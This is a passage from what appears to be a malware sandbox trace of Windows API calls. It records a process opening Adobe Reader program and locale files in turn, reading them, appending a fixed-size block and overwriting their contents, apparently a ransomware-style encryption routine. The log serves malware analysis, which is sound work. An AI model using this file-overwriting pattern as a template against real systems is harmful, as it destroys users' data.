cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0083.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.CHS", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SaveAsRTF.CHS", lpUsedDefaultChar=0x0) returned 13 [0083.061] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.063] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2200 [0083.063] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.064] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2200 [0083.064] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.065] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0083.065] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0083.065] CloseHandle (hObject=0x1ec) returned 1 [0083.065] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\accessibility.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\accessibility.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0083.066] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.066] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x6e00 [0083.066] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.066] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.066] ReleaseMutex (hMutex=0x168) returned 1 [0083.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.CHT", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0083.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.CHT", cchWideChar=17, lpMultiByteStr=0x1f88a64, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accessibility.CHT", lpUsedDefaultChar=0x0) returned 17 [0083.066] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.068] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5e00 [0083.068] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.069] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5e00 [0083.070] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.070] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0083.071] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0083.071] CloseHandle (hObject=0x1ec) returned 1 [0083.071] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\eBook.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\ebook.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0083.072] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.072] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1600 [0083.072] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.072] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.072] ReleaseMutex (hMutex=0x168) returned 1 [0083.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.CHT", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0083.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.CHT", cchWideChar=9, lpMultiByteStr=0x1f7366c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eBook.CHT", lpUsedDefaultChar=0x0) returned 9 [0083.072] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1600, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x311f2bc*=0x1600, lpOverlapped=0x0) returned 1 [0083.074] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0083.074] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1b88, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x311f2d0*=0x1b88, lpOverlapped=0x0) returned 1 [0083.075] CloseHandle (hObject=0x1ec) returned 1 [0083.075] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\ReadOutLoud.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\readoutloud.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0083.075] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.075] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x2200 [0083.076] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.076] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.076] ReleaseMutex (hMutex=0x168) returned 1 [0083.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.CHT", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0083.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.CHT", cchWideChar=15, lpMultiByteStr=0x1f7346c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadOutLoud.CHT", lpUsedDefaultChar=0x0) returned 15 [0083.076] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.078] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1200 [0083.078] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.079] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1200 [0083.079] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.079] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0083.079] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0083.079] CloseHandle (hObject=0x1ec) returned 1 [0083.080] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\updater.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\updater.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0083.080] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.080] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1e00 [0083.080] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.081] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.081] ReleaseMutex (hMutex=0x168) returned 1 [0083.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.CHT", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0083.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.CHT", cchWideChar=11, lpMultiByteStr=0x1f733cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="updater.CHT", lpUsedDefaultChar=0x0) returned 11 [0083.081] ReadFile (in: hFile=0x1ec, lpBuffer=0x2665868, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesRead=0x311f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0083.083] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0083.083] WriteFile (in: hFile=0x1ec, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x311f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0083.084] CloseHandle (hObject=0x1ec) returned 1 [0083.084] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0083.085] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.085] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xae8a63 [0083.085] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.085] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.085] ReleaseMutex (hMutex=0x168) returned 1 [0083.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AcroForm.api", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AcroForm.api", cchWideChar=12, lpMultiByteStr=0x1f7358c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AcroForm.api", lpUsedDefaultChar=0x0) returned 12 [0083.085] ReadFile (in: hFile=0x1ec, lpBuffer=0x2882db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0083.088] ReadFile (in: hFile=0x1ec, lpBuffer=0x2882db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0083.090] ReadFile (in: hFile=0x1ec, lpBuffer=0x2882db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0083.091] ReadFile (in: hFile=0x1ec, lpBuffer=0x2882db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0083.092] ReadFile (in: hFile=0x1ec, lpBuffer=0x2882db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0083.094] ReadFile (in: hFile=0x1ec, lpBuffer=0x2882db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0083.095] ReadFile (in: hFile=0x1ec, lpBuffer=0x2882db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0083.096] ReadFile (in: hFile=0x1ec, lpBuffer=0x2882db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0083.097] ReadFile (in: hFile=0x1ec, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0083.098] VirtualAlloc (lpAddress=0x0, dwSize=0xa0000, flAllocationType=0x101000, flProtect=0x4) returned 0x7eee0000 [0083.110] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xae6a63 [0083.110] ReadFile (in: hFile=0x1ec, lpBuffer=0x2665868, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesRead=0x311f278*=0x2000, lpOverlapped=0x0) returned 1 [0083.671] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xae6a63 [0083.675] VirtualAlloc (lpAddress=0x0, dwSize=0xa0000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ee40000 [0083.689] VirtualFree (lpAddress=0x7eee0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.694] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ea5e88*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesWritten=0x311f28c*=0x2588, lpOverlapped=0x0) returned 1 [0083.695] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0083.695] WriteFile (in: hFile=0x1ec, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0083.695] WriteFile (in: hFile=0x1ec, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0083.696] WriteFile (in: hFile=0x1ec, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0083.697] WriteFile (in: hFile=0x1ec, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0083.697] WriteFile (in: hFile=0x1ec, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0083.698] WriteFile (in: hFile=0x1ec, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0083.699] WriteFile (in: hFile=0x1ec, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0083.699] WriteFile (in: hFile=0x1ec, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0083.700] WriteFile (in: hFile=0x1ec, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0083.700] VirtualFree (lpAddress=0x7ee40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.705] CloseHandle (hObject=0x1ec) returned 1 [0083.705] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\IA32.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\ia32.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0083.707] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.707] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x18463 [0083.707] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.707] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.707] ReleaseMutex (hMutex=0x168) returned 1 [0083.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.api", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0083.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.api", cchWideChar=8, lpMultiByteStr=0x1f735ac, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IA32.api", lpUsedDefaultChar=0x0) returned 8 [0083.880] ReadFile (in: hFile=0x1ec, lpBuffer=0x2692de8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0083.883] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x17463 [0083.883] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.884] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x17463 [0083.884] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.884] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0083.885] WriteFile (in: hFile=0x1ec, lpBuffer=0x2692de8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0083.885] CloseHandle (hObject=0x1ec) returned 1 [0083.885] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0083.886] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.886] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xa00 [0083.886] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.887] WaitForSingleObject (hHandle=0x168, 